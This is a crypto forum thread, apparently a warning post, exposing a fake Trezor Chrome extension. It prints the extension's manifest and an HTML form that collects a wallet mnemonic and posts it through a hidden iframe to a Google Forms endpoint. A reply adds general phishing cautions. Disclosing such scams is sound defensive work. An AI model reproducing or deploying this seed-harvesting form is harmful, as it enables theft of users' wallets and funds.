Trezor fake Chrome extension

[TravelMug]

Last week I created this thread: Ledger Live fake Chrome extensions, and some of them have been taken down already. However, scammers shifted their attention to Trezor now (same bad actors), and has been downloaded 33 times already. So someone has fallen for the trick already.

Actual images in Chrome Web Store

Extensions:

Code:

https://chrome.google.com/webstore/detail/trezor/dkhcmjfipgoapjamnngolidbcakpdhgf

Archive: http://web.archive.org/save/https://chrome.google.com/webstore/detail/trezor/dkhcmjfipgoapjamnngolidbcakpdhgf

Looking closely at the code, once you enter you seed or mnemonic phrase it will be posted to:

Code:

https://docs.google.com/forms/d/e/1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ

Snippet of the actual code, Index.html

Code:

  <div class="wrapper">
      <form id="form" action="https://docs.google.com/forms/d/e/1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ/formResponse" method="post" target="hidden_iframe" autocomplete="off"> 

        <iframe name="hidden_iframe" id="hidden_iframe" style="display:none;"></iframe> 

      <div class="row">
        <input id="Field" name="entry.1957119181" placeholder="Please enter your mnemonic phrase, with one space between each word to restore a previously created wallet." type="text" required> 
      </div>

and manifest.json

Code:

{
   "browser_action": {
      "default_icon": {
         "256": "icons/icon-256.png"
      },
      "default_popup": "index.html",
      "default_title": "Trezor"
   },
   "description": "Manage your Trezor Model T or Trezor Model One",
   "icons": {
      "128": "icons/icon-128.png",
      "16": "icons/icon-16.png",
      "32": "icons/icon-32.png",
      "64": "icons/icon-64.png"
   },
   "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv8CKg8/A94UadtWvh7bd0F3jtGkcYFXCmm1TWrNa9VCKpNV8VkHFtNsM/feGt1U4jFsAXthO5qkL92TZ8luT9fpM5ntukMfE1R7Uj7DTpobixRsNNI0MM72hWIoeH/4aD6cwN60SWLsg2jjQua/oX2BKN2ZmQmXCm7nepR30RcxNiRwKSU6gUfZIUIW+CXpGMQWaQgASOInq9pxEzfh7jWJlOt8f7b4Jfp3v5RY0JLidRK0vI41psCuMc6+QvmnA7L3arNWZ7YJ4y4PmkKTlmKt4Oe+8HkNhZU4/7BaBJNntxu32rB6naovhE3Ed/jmu1T/12iArJQ9brWS44VmXFwIDAQAB",
   "manifest_version": 2,
   "name": "Trezor",
   "update_url": "https://clients2.google.com/service/update2/crx",
   "version": "2.3.9"
}

I'm expecting more Trezor chrome extension to pop up in the next coming days, I will keep this thread updated if I find more and everyone should be careful.

[1714869904]

1714869904

[1714869904]

1714869904

[1714869904]

1714869904

[tbct_mt2]

People tend to create opportunities to steal their money by being too lazy. I don't mention about Trezor Chrome extension but I would like to expand the warning more widely. If one has been in crypto for too long, they would have known that there are many phishing attacks, and fake extensions (fake extensions of Myetherwallet for instance).

Moreover, bookmark can not protect people completely if their computers are infected with hazardous threats.

Stay being careful with any extentions, not relying on any tools and stay safe in crypto.